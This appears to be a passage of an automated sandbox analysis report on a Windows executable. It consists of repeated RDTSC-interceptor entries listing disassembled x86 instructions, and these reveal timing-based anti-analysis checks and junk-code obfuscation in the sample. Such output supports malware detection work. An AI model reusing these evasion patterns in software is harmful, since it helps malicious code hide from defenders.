Source: C:\Users\user\Desktop\5KwhHEdmM4.exeRDTSC instruction interceptor: First address: 72803B2 second address: 72804AA instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 test esi, esi 0x0000000a pushad 0x0000000b mov cl, A4h 0x0000000d pushfd 0x0000000e jmp 00007F10C4816E09h 0x00000013 or ah, FFFFFF86h 0x00000016 jmp 00007F10C4816E01h 0x0000001b popfd 0x0000001c popad 0x0000001d je 00007F11347560AFh 0x00000023 pushad 0x00000024 call 00007F10C4816DFCh 0x00000029 mov di, ax 0x0000002c pop eax 0x0000002d pushfd 0x0000002e jmp 00007F10C4816E07h 0x00000033 or cl, 0000006Eh 0x00000036 jmp 00007F10C4816E09h 0x0000003b popfd 0x0000003c popad 0x0000003d sub eax, eax 0x0000003f pushad 0x00000040 pushfd 0x00000041 jmp 00007F10C4816DFDh 0x00000046 jmp 00007F10C4816DFBh 0x0000004b popfd 0x0000004c call 00007F10C4816E08h 0x00000051 mov bx, ax 0x00000054 pop eax 0x00000055 popad 0x00000056 mov dword ptr [esi], edi 0x00000058 push eax 0x00000059 push edx 0x0000005a pushad 0x0000005b movzx esi, di 0x0000005e pushfd 0x0000005f jmp 00007F10C4816DFBh 0x00000064 or si, 398Eh 0x00000069 jmp 00007F10C4816E09h 0x0000006e popfd 0x0000006f popad 0x00000070 rdtsc
Source: C:\Users\user\Desktop\5KwhHEdmM4.exeRDTSC instruction interceptor: First address: 72804AA second address: 72804B0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\5KwhHEdmM4.exeRDTSC instruction interceptor: First address: 72804B0 second address: 72804B4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\5KwhHEdmM4.exeRDTSC instruction interceptor: First address: 72804B4 second address: 72804B8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\5KwhHEdmM4.exeRDTSC instruction interceptor: First address: 72804B8 second address: 72804DB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov dword ptr [esi+04h], eax 0x0000000b jmp 00007F10C4816DFFh 0x00000010 mov dword ptr [esi+08h], eax 0x00000013 push eax 0x00000014 push edx 0x00000015 push eax 0x00000016 push edx 0x00000017 pushad 0x00000018 popad 0x00000019 rdtsc
Source: C:\Users\user\Desktop\5KwhHEdmM4.exeRDTSC instruction interceptor: First address: 72804DB second address: 72804E1 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\5KwhHEdmM4.exeRDTSC instruction interceptor: First address: 72804E1 second address: 728051E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F10C4816DFAh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esi+0Ch], eax 0x0000000c pushad 0x0000000d movzx esi, di 0x00000010 jmp 00007F10C4816E03h 0x00000015 popad 0x00000016 mov eax, dword ptr [ebx+4Ch] 0x00000019 push eax 0x0000001a push edx 0x0000001b pushad 0x0000001c jmp 00007F10C4816DFBh 0x00000021 push eax 0x00000022 pop ebx 0x00000023 popad 0x00000024 rdtsc
Source: C:\Users\user\Desktop\5KwhHEdmM4.exeRDTSC instruction interceptor: First address: 728051E second address: 7280524 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\5KwhHEdmM4.exeRDTSC instruction interceptor: First address: 7280524 second address: 7280528 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\5KwhHEdmM4.exeRDTSC instruction interceptor: First address: 7280528 second address: 7280553 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov dword ptr [esi+10h], eax 0x0000000b jmp 00007F10C4818123h 0x00000010 mov eax, dword ptr [ebx+50h] 0x00000013 push eax 0x00000014 push edx 0x00000015 pushad 0x00000016 mov al, bh 0x00000018 mov ax, CAB3h 0x0000001c popad 0x0000001d rdtsc
Source: C:\Users\user\Desktop\5KwhHEdmM4.exeRDTSC instruction interceptor: First address: 7280553 second address: 72805C9 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007F10C4816DFFh 0x00000009 and ecx, 53794D1Eh 0x0000000f jmp 00007F10C4816E09h 0x00000014 popfd 0x00000015 mov di, cx 0x00000018 popad 0x00000019 pop edx 0x0000001a pop eax 0x0000001b mov dword ptr [esi+14h], eax 0x0000001e pushad 0x0000001f mov edi, eax 0x00000021 pushfd 0x00000022 jmp 00007F10C4816E04h 0x00000027 sub ecx, 0D02EA48h 0x0000002d jmp 00007F10C4816DFBh 0x00000032 popfd 0x00000033 popad 0x00000034 mov eax, dword ptr [ebx+54h] 0x00000037 push eax 0x00000038 push edx 0x00000039 pushad 0x0000003a movsx edx, cx 0x0000003d mov eax, 31AA9653h 0x00000042 popad 0x00000043 rdtsc
Source: C:\Users\user\Desktop\5KwhHEdmM4.exeRDTSC instruction interceptor: First address: 72805C9 second address: 728063D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F10C4818129h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esi+18h], eax 0x0000000c pushad 0x0000000d pushfd 0x0000000e jmp 00007F10C481811Ch 0x00000013 xor esi, 08501F08h 0x00000019 jmp 00007F10C481811Bh 0x0000001e popfd 0x0000001f pushfd 0x00000020 jmp 00007F10C4818128h 0x00000025 adc si, C168h 0x0000002a jmp 00007F10C481811Bh 0x0000002f popfd 0x00000030 popad 0x00000031 mov eax, dword ptr [ebx+58h] 0x00000034 push eax 0x00000035 push edx 0x00000036 push eax 0x00000037 push edx 0x00000038 push eax 0x00000039 push edx 0x0000003a rdtsc
Source: C:\Users\user\Desktop\5KwhHEdmM4.exeRDTSC instruction interceptor: First address: 728063D second address: 7280641 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\5KwhHEdmM4.exeRDTSC instruction interceptor: First address: 7280641 second address: 7280647 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\5KwhHEdmM4.exeRDTSC instruction interceptor: First address: 7280647 second address: 728064D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\5KwhHEdmM4.exeRDTSC instruction interceptor: First address: 728064D second address: 7280651 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\5KwhHEdmM4.exeRDTSC instruction interceptor: First address: 7280651 second address: 7280674 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov dword ptr [esi+1Ch], eax 0x0000000b jmp 00007F10C4816E00h 0x00000010 mov eax, dword ptr [ebx+5Ch] 0x00000013 push eax 0x00000014 push edx 0x00000015 pushad 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
Source: C:\Users\user\Desktop\5KwhHEdmM4.exeRDTSC instruction interceptor: First address: 7280674 second address: 728068C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F10C4818123h 0x00000009 popad 0x0000000a rdtsc
Source: C:\Users\user\Desktop\5KwhHEdmM4.exeRDTSC instruction interceptor: First address: 728068C second address: 72806BB instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F10C4816E09h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esi+20h], eax 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007F10C4816DFDh 0x00000013 rdtsc
Source: C:\Users\user\Desktop\5KwhHEdmM4.exeRDTSC instruction interceptor: First address: 72806BB second address: 72806C1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\5KwhHEdmM4.exeRDTSC instruction interceptor: First address: 72806C1 second address: 72806C5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\5KwhHEdmM4.exeRDTSC instruction interceptor: First address: 72806C5 second address: 7280754 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov eax, dword ptr [ebx+60h] 0x0000000b pushad 0x0000000c jmp 00007F10C4818125h 0x00000011 mov eax, 32F40ED7h 0x00000016 popad 0x00000017 mov dword ptr [esi+24h], eax 0x0000001a jmp 00007F10C481811Ah 0x0000001f mov eax, dword ptr [ebx+64h] 0x00000022 jmp 00007F10C4818120h 0x00000027 mov dword ptr [esi+28h], eax 0x0000002a pushad 0x0000002b pushfd 0x0000002c jmp 00007F10C481811Eh 0x00000031 jmp 00007F10C4818125h 0x00000036 popfd 0x00000037 movzx esi, bx 0x0000003a popad 0x0000003b mov eax, dword ptr [ebx+68h] 0x0000003e push eax 0x0000003f push edx 0x00000040 jmp 00007F10C4818126h 0x00000045 rdtsc
Source: C:\Users\user\Desktop\5KwhHEdmM4.exeRDTSC instruction interceptor: First address: 7280754 second address: 728076E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F10C4816DFBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esi+2Ch], eax 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f movsx edx, ax 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\5KwhHEdmM4.exeRDTSC instruction interceptor: First address: 728076E second address: 7280773 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\5KwhHEdmM4.exeRDTSC instruction interceptor: First address: 7280773 second address: 728079A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov edi, 05E1ACACh 0x00000008 mov dl, E7h 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d mov ax, word ptr [ebx+6Ch] 0x00000011 jmp 00007F10C4816DFCh 0x00000016 mov word ptr [esi+30h], ax 0x0000001a push eax 0x0000001b push edx 0x0000001c push eax 0x0000001d push edx 0x0000001e push eax 0x0000001f push edx 0x00000020 rdtsc
Source: C:\Users\user\Desktop\5KwhHEdmM4.exeRDTSC instruction interceptor: First address: 728079A second address: 728079E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\5KwhHEdmM4.exeRDTSC instruction interceptor: First address: 728079E second address: 72807A2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\5KwhHEdmM4.exeRDTSC instruction interceptor: First address: 72807A2 second address: 72807A8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\5KwhHEdmM4.exeRDTSC instruction interceptor: First address: 72807A8 second address: 72807E4 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F10C4816E04h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov ax, word ptr [ebx+00000088h] 0x00000010 jmp 00007F10C4816E00h 0x00000015 mov word ptr [esi+32h], ax 0x00000019 push eax 0x0000001a push edx 0x0000001b pushad 0x0000001c pushad 0x0000001d popad 0x0000001e movsx edx, cx 0x00000021 popad 0x00000022 rdtsc
Source: C:\Users\user\Desktop\5KwhHEdmM4.exeRDTSC instruction interceptor: First address: 72807E4 second address: 72807EA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\5KwhHEdmM4.exeRDTSC instruction interceptor: First address: 72807EA second address: 72807EE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\5KwhHEdmM4.exeRDTSC instruction interceptor: First address: 72807EE second address: 7280860 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov eax, dword ptr [ebx+0000008Ch] 0x0000000e pushad 0x0000000f jmp 00007F10C4818129h 0x00000014 pushfd 0x00000015 jmp 00007F10C4818120h 0x0000001a add si, B118h 0x0000001f jmp 00007F10C481811Bh 0x00000024 popfd 0x00000025 popad 0x00000026 mov dword ptr [esi+34h], eax 0x00000029 pushad 0x0000002a mov eax, 65A7AAEBh 0x0000002f mov ah, 0Ah 0x00000031 popad 0x00000032 mov eax, dword ptr [ebx+18h] 0x00000035 push eax 0x00000036 push edx 0x00000037 jmp 00007F10C4818126h 0x0000003c rdtsc
Source: C:\Users\user\Desktop\5KwhHEdmM4.exeRDTSC instruction interceptor: First address: 7280860 second address: 72808BB instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F10C4816DFBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esi+38h], eax 0x0000000c jmp 00007F10C4816E06h 0x00000011 mov eax, dword ptr [ebx+1Ch] 0x00000014 pushad 0x00000015 mov cx, C9DDh 0x00000019 jmp 00007F10C4816DFAh 0x0000001e popad 0x0000001f mov dword ptr [esi+3Ch], eax 0x00000022 jmp 00007F10C4816E00h 0x00000027 mov eax, dword ptr [ebx+20h] 0x0000002a pushad 0x0000002b mov esi, 6D037ABDh 0x00000030 push eax 0x00000031 push edx 0x00000032 mov edx, eax 0x00000034 rdtsc
Source: C:\Users\user\Desktop\5KwhHEdmM4.exeRDTSC instruction interceptor: First address: 72808BB second address: 72808CB instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 mov dword ptr [esi+40h], eax 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d movzx ecx, bx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\5KwhHEdmM4.exeRDTSC instruction interceptor: First address: 72808CB second address: 72808E1 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 mov si, dx 0x00000009 popad 0x0000000a lea eax, dword ptr [ebx+00000080h] 0x00000010 push eax 0x00000011 push edx 0x00000012 push eax 0x00000013 push edx 0x00000014 pushad 0x00000015 popad 0x00000016 rdtsc
Source: C:\Users\user\Desktop\5KwhHEdmM4.exeRDTSC instruction interceptor: First address: 72808E1 second address: 72808FB instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F10C4818126h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\5KwhHEdmM4.exeRDTSC instruction interceptor: First address: 72808FB second address: 7280929 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F10C4816DFBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push 00000001h 0x0000000b jmp 00007F10C4816E06h 0x00000010 nop 0x00000011 push eax 0x00000012 push edx 0x00000013 push eax 0x00000014 push edx 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
Source: C:\Users\user\Desktop\5KwhHEdmM4.exeRDTSC instruction interceptor: First address: 7280929 second address: 728092D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\5KwhHEdmM4.exeRDTSC instruction interceptor: First address: 728092D second address: 7280933 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\5KwhHEdmM4.exeRDTSC instruction interceptor: First address: 7280933 second address: 7280939 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\5KwhHEdmM4.exeRDTSC instruction interceptor: First address: 7280939 second address: 728093D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\5KwhHEdmM4.exeRDTSC instruction interceptor: First address: 728093D second address: 7280960 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007F10C4818128h 0x00000010 rdtsc
Source: C:\Users\user\Desktop\5KwhHEdmM4.exeRDTSC instruction interceptor: First address: 7280960 second address: 72809B2 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 pushad 0x00000006 popad 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a nop 0x0000000b pushad 0x0000000c movsx ebx, ax 0x0000000f pushfd 0x00000010 jmp 00007F10C4816E02h 0x00000015 xor cx, AE78h 0x0000001a jmp 00007F10C4816DFBh 0x0000001f popfd 0x00000020 popad 0x00000021 lea eax, dword ptr [ebp-10h] 0x00000024 push eax 0x00000025 push edx 0x00000026 pushad 0x00000027 jmp 00007F10C4816E07h 0x0000002c popad 0x0000002d rdtsc
Source: C:\Users\user\Desktop\5KwhHEdmM4.exeRDTSC instruction interceptor: First address: 72809B2 second address: 72809B7 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\5KwhHEdmM4.exeRDTSC instruction interceptor: First address: 72809B7 second address: 72809C5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 nop 0x00000008 push eax 0x00000009 push edx 0x0000000a pushad 0x0000000b push eax 0x0000000c pop edi 0x0000000d popad 0x0000000e rdtsc
Source: C:\Users\user\Desktop\5KwhHEdmM4.exeRDTSC instruction interceptor: First address: 72809C5 second address: 72809E1 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov si, dx 0x00000006 movsx edx, si 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d pushad 0x0000000e push eax 0x0000000f push edx 0x00000010 call 00007F10C481811Bh 0x00000015 pop ecx 0x00000016 rdtsc
Source: C:\Users\user\Desktop\5KwhHEdmM4.exeRDTSC instruction interceptor: First address: 7280A2A second address: 7280A30 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\5KwhHEdmM4.exeRDTSC instruction interceptor: First address: 7280A30 second address: 7280A99 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 call 00007F10C481811Eh 0x00000008 pop eax 0x00000009 call 00007F10C481811Bh 0x0000000e pop eax 0x0000000f popad 0x00000010 pop edx 0x00000011 pop eax 0x00000012 mov edi, eax 0x00000014 jmp 00007F10C481811Fh 0x00000019 test edi, edi 0x0000001b jmp 00007F10C4818126h 0x00000020 js 00007F1134756D5Fh 0x00000026 push eax 0x00000027 push edx 0x00000028 jmp 00007F10C4818127h 0x0000002d rdtsc
Source: C:\Users\user\Desktop\5KwhHEdmM4.exeRDTSC instruction interceptor: First address: 7280A99 second address: 7280AB1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F10C4816E04h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\5KwhHEdmM4.exeRDTSC instruction interceptor: First address: 7280AB1 second address: 7280ADB instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov eax, dword ptr [ebp-0Ch] 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e jmp 00007F10C4818128h 0x00000013 mov bx, cx 0x00000016 popad 0x00000017 rdtsc
Source: C:\Users\user\Desktop\5KwhHEdmM4.exeRDTSC instruction interceptor: First address: 7280ADB second address: 7280AFA instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov dx, 9320h 0x00000007 push edi 0x00000008 pop eax 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c mov dword ptr [esi+04h], eax 0x0000000f push eax 0x00000010 push edx 0x00000011 jmp 00007F10C4816DFEh 0x00000016 rdtsc
Source: C:\Users\user\Desktop\5KwhHEdmM4.exeRDTSC instruction interceptor: First address: 7280AFA second address: 7280B18 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F10C481811Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 lea eax, dword ptr [ebx+78h] 0x0000000c pushad 0x0000000d movzx ecx, dx 0x00000010 popad 0x00000011 push 00000001h 0x00000013 push eax 0x00000014 push edx 0x00000015 pushad 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
Source: C:\Users\user\Desktop\5KwhHEdmM4.exeRDTSC instruction interceptor: First address: 7280B18 second address: 7280B1F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 rdtsc
Source: C:\Users\user\Desktop\5KwhHEdmM4.exeRDTSC instruction interceptor: First address: 7280B1F second address: 7280BE5 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov eax, 0B9AA99Dh 0x00000008 pushfd 0x00000009 jmp 00007F10C481811Ah 0x0000000e and esi, 23644AF8h 0x00000014 jmp 00007F10C481811Bh 0x00000019 popfd 0x0000001a popad 0x0000001b pop edx 0x0000001c pop eax 0x0000001d nop 0x0000001e pushad 0x0000001f pushfd 0x00000020 jmp 00007F10C4818124h 0x00000025 sbb eax, 3020A558h 0x0000002b jmp 00007F10C481811Bh 0x00000030 popfd 0x00000031 pushad 0x00000032 pushfd 0x00000033 jmp 00007F10C4818126h 0x00000038 jmp 00007F10C4818125h 0x0000003d popfd 0x0000003e popad 0x0000003f popad 0x00000040 push eax 0x00000041 pushad 0x00000042 mov ax, dx 0x00000045 pushfd 0x00000046 jmp 00007F10C481811Fh 0x0000004b or cx, 0E2Eh 0x00000050 jmp 00007F10C4818129h 0x00000055 popfd 0x00000056 popad 0x00000057 nop 0x00000058 push eax 0x00000059 push edx 0x0000005a jmp 00007F10C481811Dh 0x0000005f rdtsc
Source: C:\Users\user\Desktop\5KwhHEdmM4.exeRDTSC instruction interceptor: First address: 7280BE5 second address: 7280BEB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\5KwhHEdmM4.exeRDTSC instruction interceptor: First address: 7280BEB second address: 7280C6F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F10C4818123h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b lea eax, dword ptr [ebp-08h] 0x0000000e pushad 0x0000000f call 00007F10C4818124h 0x00000014 pushfd 0x00000015 jmp 00007F10C4818122h 0x0000001a sbb cx, E068h 0x0000001f jmp 00007F10C481811Bh 0x00000024 popfd 0x00000025 pop eax 0x00000026 push edi 0x00000027 call 00007F10C4818124h 0x0000002c pop ecx 0x0000002d pop edx 0x0000002e popad 0x0000002f nop 0x00000030 jmp 00007F10C481811Eh 0x00000035 push eax 0x00000036 push eax 0x00000037 push edx 0x00000038 push eax 0x00000039 push edx 0x0000003a push eax 0x0000003b push edx 0x0000003c rdtsc
Source: C:\Users\user\Desktop\5KwhHEdmM4.exeRDTSC instruction interceptor: First address: 7280C6F second address: 7280C73 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\5KwhHEdmM4.exeRDTSC instruction interceptor: First address: 7280C73 second address: 7280C8F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F10C4818128h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\5KwhHEdmM4.exeRDTSC instruction interceptor: First address: 7280C8F second address: 7280CA5 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F10C4816DFBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 nop 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\5KwhHEdmM4.exeRDTSC instruction interceptor: First address: 7280CA5 second address: 7280CA9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\5KwhHEdmM4.exeRDTSC instruction interceptor: First address: 7280CA9 second address: 7280CAD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\5KwhHEdmM4.exeRDTSC instruction interceptor: First address: 7280CAD second address: 7280CB3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\5KwhHEdmM4.exeRDTSC instruction interceptor: First address: 7280CFA second address: 7280D00 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\5KwhHEdmM4.exeRDTSC instruction interceptor: First address: 7280D00 second address: 7280D04 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\5KwhHEdmM4.exeRDTSC instruction interceptor: First address: 7280D04 second address: 7280D5D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 test edi, edi 0x0000000a jmp 00007F10C4816E08h 0x0000000f js 00007F1134755789h 0x00000015 pushad 0x00000016 mov esi, 7D1724FDh 0x0000001b mov edi, esi 0x0000001d popad 0x0000001e mov eax, dword ptr [ebp-04h] 0x00000021 jmp 00007F10C4816E04h 0x00000026 mov dword ptr [esi+08h], eax 0x00000029 push eax 0x0000002a push edx 0x0000002b push eax 0x0000002c push edx 0x0000002d jmp 00007F10C4816DFAh 0x00000032 rdtsc
Source: C:\Users\user\Desktop\5KwhHEdmM4.exeRDTSC instruction interceptor: First address: 7280D5D second address: 7280D61 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\5KwhHEdmM4.exeRDTSC instruction interceptor: First address: 7280D61 second address: 7280D67 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\5KwhHEdmM4.exeRDTSC instruction interceptor: First address: 7280D67 second address: 7280D7B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push esi 0x00000004 pop edi 0x00000005 mov dx, cx 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b lea eax, dword ptr [ebx+70h] 0x0000000e pushad 0x0000000f push eax 0x00000010 push edx 0x00000011 movzx eax, di 0x00000014 rdtsc
Source: C:\Users\user\Desktop\5KwhHEdmM4.exeRDTSC instruction interceptor: First address: 7280D7B second address: 7280DB8 instructions: 0x00000000 rdtsc 0x00000002 mov ecx, ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 mov bl, 68h 0x00000008 popad 0x00000009 push 00000001h 0x0000000b pushad 0x0000000c pushfd 0x0000000d jmp 00007F10C4816DFCh 0x00000012 add esi, 517805C8h 0x00000018 jmp 00007F10C4816DFBh 0x0000001d popfd 0x0000001e mov ch, 8Fh 0x00000020 popad 0x00000021 push esp 0x00000022 push eax 0x00000023 push edx 0x00000024 push eax 0x00000025 push edx 0x00000026 jmp 00007F10C4816DFAh 0x0000002b rdtsc
Source: C:\Users\user\Desktop\5KwhHEdmM4.exeRDTSC instruction interceptor: First address: 7280DB8 second address: 7280DC7 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F10C481811Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\5KwhHEdmM4.exeRDTSC instruction interceptor: First address: 7280DC7 second address: 7280DF6 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F10C4816E09h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esp], eax 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007F10C4816DFDh 0x00000013 rdtsc
